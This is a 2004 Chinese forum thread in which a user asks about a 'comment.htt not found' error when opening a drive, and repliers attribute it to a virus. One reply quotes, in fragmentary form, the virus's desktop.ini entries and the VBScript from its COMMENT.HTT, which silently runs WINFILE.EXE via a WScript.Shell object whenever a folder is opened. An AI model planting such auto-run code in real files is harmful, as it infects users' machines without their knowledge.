我的系统好像错误太多了

donghf 2004-08-27 11:52:50
我在点击D盘符的时候出现这样的问题:
未找到FILE:///D:/COMMENT.HTT 请确认路径或是INTERNET的地址正确,点击确定后能够进去,但是界面分成了两个
框架,左边是D盘的空间使用情况,右边是D盘的文件夹
这是什么问题啊
...全文
72 8 打赏 收藏 转发到动态 举报
写回复
用AI写文章
8 条回复
切换为时间正序
请发表友善的回复…
发表回复
ichi 2004-08-27
  • 打赏
  • 举报
回复
我的移动硬盘也是这样,一插到某台机上就出现comment.htt错误,我也想解决,楼上说病毒,那你说我的移动硬盘会感染吗?

不会才怪.
sandwich1981 2004-08-27
  • 打赏
  • 举报
回复
我的移动硬盘也是这样,一插到某台机上就出现comment.htt错误,我也想解决,楼上说病毒,那你说我的移动硬盘会感染吗?
popjohn 2004-08-27
  • 打赏
  • 举报
回复
病毒吧 杀毒先
zhongyv000 2004-08-27
  • 打赏
  • 举报
回复
直接删除盘符下“desktop.ini”"folder.htt"或者“autorun.inf”之类的文件试试
xjp6688 2004-08-27
  • 打赏
  • 举报
回复
中毒了,如果杀不净,重装吧!
celerylhl 2004-08-27
  • 打赏
  • 举报
回复
绝对病毒,杀吧
UnrealImagecoffee 2004-08-27
  • 打赏
  • 举报
回复
楼上 楼上 楼上 正确

楼上 不知道 不要 乱说

对病毒 了结的 少 就 避 了
UnrealImagecoffee 2004-08-27
  • 打赏
  • 举报
回复
呵呵
winfile.exe 病毒
‘DESKTOP.INI’文件内的内容:



[.ShellClassInfo]
HTMLInfoTipFile=file://Comment.htt
ConfirmFileOp=0

也许这样 ,大多类似:
COMMENT.HTT 文件内的主要内容:




document.write





OnErrorResumeNext
Dimwe,path,win
we=
Path=
win=
Path=Left(document.location,Len(document.location)-11)
Path=Mid(Path,9)
SetAppleObject=document.applets(lhw)
AppleObject.setCLSID({F935DC22-1CF0-11D0-ADB9-00C04FD58A0B})
AppleObject.createInstance()
SetWsShell=AppleObject.GetObject()
Wsshell.run(Path+WINFILE.EXE)

6,849

社区成员

发帖
与我相关
我的任务
社区描述
Windows 2016/2012/2008/2003/2000/NT
社区管理员
  • Windows Server社区
  • qishine
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧